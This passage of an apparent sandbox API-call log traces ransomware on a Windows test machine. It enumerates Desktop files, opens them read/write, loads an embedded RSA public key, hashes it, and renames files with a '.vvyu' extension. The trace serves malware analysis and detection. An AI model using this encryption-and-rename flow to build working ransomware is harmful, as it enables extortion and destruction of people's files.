lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e96e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96e98 | out: hHeap=0x620000) returned 1 [0192.078] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.078] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.078] CloseHandle (hObject=0x568) returned 1 [0192.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0192.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2e96a68 [0192.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0192.088] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\2UV3oZuGwQu6CYc7-L.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\2uv3ozugwqu6cyc7-l.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\2UV3oZuGwQu6CYc7-L.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\2uv3ozugwqu6cyc7-l.swf.vvyu")) returned 1 [0192.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.090] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0192.093] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2386cf50, ftCreationTime.dwHighDateTime=0x1d899fe, ftLastAccessTime.dwLowDateTime=0xa53a6410, ftLastAccessTime.dwHighDateTime=0x1d8a1cb, ftLastWriteTime.dwLowDateTime=0xa53a6410, ftLastWriteTime.dwHighDateTime=0x1d8a1cb, nFileSizeHigh=0x0, nFileSizeLow=0x6dbc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="823XfKbFCBWP.m4a", cAlternateFileName="823XFK~1.M4A")) returned 1 [0192.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94d08 [0192.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0192.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94d08 | out: hHeap=0x620000) returned 1 [0192.094] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\823XfKbFCBWP.m4a") returned=".m4a" [0192.094] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\823XfKbFCBWP.m4a" (normalized: "c:\\users\\keecfmwgj\\desktop\\823xfkbfcbwp.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0192.094] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=28092) returned 1 [0192.094] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0192.102] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x6d96, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.102] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.104] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.104] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x6dbc, lpOverlapped=0x0) returned 1 [0192.106] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0192.107] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.107] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.107] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0192.108] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0192.108] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.108] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0192.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0192.108] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0192.108] GetLastError () returned 0x0 [0192.108] SetLastError (dwErrCode=0x0) [0192.108] GetLastError () returned 0x0 [0192.108] SetLastError (dwErrCode=0x0) [0192.108] GetLastError () returned 0x0 [0192.108] SetLastError (dwErrCode=0x0) [0192.108] GetLastError () returned 0x0 [0192.108] SetLastError (dwErrCode=0x0) [0192.108] GetLastError () returned 0x0 [0192.109] SetLastError (dwErrCode=0x0) [0192.109] GetLastError () returned 0x0 [0192.109] SetLastError (dwErrCode=0x0) [0192.109] GetLastError () returned 0x0 [0192.109] SetLastError (dwErrCode=0x0) [0192.109] GetLastError () returned 0x0 [0192.109] SetLastError (dwErrCode=0x0) [0192.109] GetLastError () returned 0x0 [0192.109] SetLastError (dwErrCode=0x0) [0192.109] GetLastError () returned 0x0 [0192.109] SetLastError (dwErrCode=0x0) [0192.109] GetLastError () returned 0x0 [0192.109] SetLastError (dwErrCode=0x0) [0192.109] GetLastError () returned 0x0 [0192.109] SetLastError (dwErrCode=0x0) [0192.109] GetLastError () returned 0x0 [0192.109] SetLastError (dwErrCode=0x0) [0192.109] GetLastError () returned 0x0 [0192.109] SetLastError (dwErrCode=0x0) [0192.109] GetLastError () returned 0x0 [0192.109] SetLastError (dwErrCode=0x0) [0192.109] GetLastError () returned 0x0 [0192.109] SetLastError (dwErrCode=0x0) [0192.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.110] GetLastError () returned 0x0 [0192.110] SetLastError (dwErrCode=0x0) [0192.110] GetLastError () returned 0x0 [0192.110] SetLastError (dwErrCode=0x0) [0192.110] GetLastError () returned 0x0 [0192.110] SetLastError (dwErrCode=0x0) [0192.110] GetLastError () returned 0x0 [0192.110] SetLastError (dwErrCode=0x0) [0192.110] GetLastError () returned 0x0 [0192.110] SetLastError (dwErrCode=0x0) [0192.110] GetLastError () returned 0x0 [0192.110] SetLastError (dwErrCode=0x0) [0192.110] GetLastError () returned 0x0 [0192.110] SetLastError (dwErrCode=0x0) [0192.110] GetLastError () returned 0x0 [0192.110] SetLastError (dwErrCode=0x0) [0192.110] GetLastError () returned 0x0 [0192.110] SetLastError (dwErrCode=0x0) [0192.110] GetLastError () returned 0x0 [0192.110] SetLastError (dwErrCode=0x0) [0192.110] GetLastError () returned 0x0 [0192.110] SetLastError (dwErrCode=0x0) [0192.110] GetLastError () returned 0x0 [0192.111] SetLastError (dwErrCode=0x0) [0192.111] GetLastError () returned 0x0 [0192.111] SetLastError (dwErrCode=0x0) [0192.111] GetLastError () returned 0x0 [0192.111] SetLastError (dwErrCode=0x0) [0192.111] GetLastError () returned 0x0 [0192.111] SetLastError (dwErrCode=0x0) [0192.111] GetLastError () returned 0x0 [0192.111] SetLastError (dwErrCode=0x0) [0192.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.112] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0192.112] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0192.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.113] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0192.113] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0192.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.113] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0192.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x6dc0) returned 0x2e96a68 [0192.114] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0192.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0192.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0192.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94d08 [0192.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934e0 [0192.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94cc0 [0192.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93450 [0192.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934c8 [0192.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93540 [0192.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934f8 [0192.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0192.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x655b18 [0192.115] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x655b18, Size=0x218) returned 0x2e9d830 [0192.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2e9da50 [0192.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934c8 | out: hHeap=0x620000) returned 1 [0192.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934f8 | out: hHeap=0x620000) returned 1 [0192.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93540 | out: hHeap=0x620000) returned 1 [0192.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0192.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9da50 | out: hHeap=0x620000) returned 1 [0192.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93540 [0192.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0192.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c934f8 [0192.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0192.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c934c8 [0192.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0192.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2e914a8 [0192.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0192.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0192.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0192.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0192.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934f8 | out: hHeap=0x620000) returned 1 [0192.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934c8 | out: hHeap=0x620000) returned 1 [0192.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.118] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93540 | out: hHeap=0x620000) returned 1 [0192.118] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.118] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0192.119] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9d830 | out: hHeap=0x620000) returned 1 [0192.119] GetCurrentThreadId () returned 0x66c [0192.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0192.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64df90 [0192.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0192.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0192.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0192.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0192.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.120] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.120] GetCurrentThreadId () returned 0x66c [0192.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.120] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0192.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.121] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.121] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.121] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0192.122] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccadf0 [0192.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0192.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93540 [0192.122] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0192.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0192.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0192.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934c8 [0192.122] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0192.122] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0192.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0192.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0192.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c934f8 [0192.122] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0192.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0192.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0192.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93570 [0192.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0192.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93558 [0192.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0192.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93528 [0192.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93510 [0192.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c935b8 [0192.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93510 | out: hHeap=0x620000) returned 1 [0192.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93510 [0192.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93528 | out: hHeap=0x620000) returned 1 [0192.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0192.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0192.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0192.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934c8 | out: hHeap=0x620000) returned 1 [0192.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c934c8 [0192.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2e9d830 [0192.124] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93540 | out: hHeap=0x620000) returned 1 [0192.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0192.124] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935b8 | out: hHeap=0x620000) returned 1 [0192.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2e9da40 [0192.124] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2e914a8 [0192.124] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0192.124] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934c8 | out: hHeap=0x620000) returned 1 [0192.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2e9dc58 [0192.124] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0192.125] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.125] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0192.125] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0192.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0192.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0192.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9da40 | out: hHeap=0x620000) returned 1 [0192.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9dc58 | out: hHeap=0x620000) returned 1 [0192.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93510 | out: hHeap=0x620000) returned 1 [0192.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93558 | out: hHeap=0x620000) returned 1 [0192.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.128] 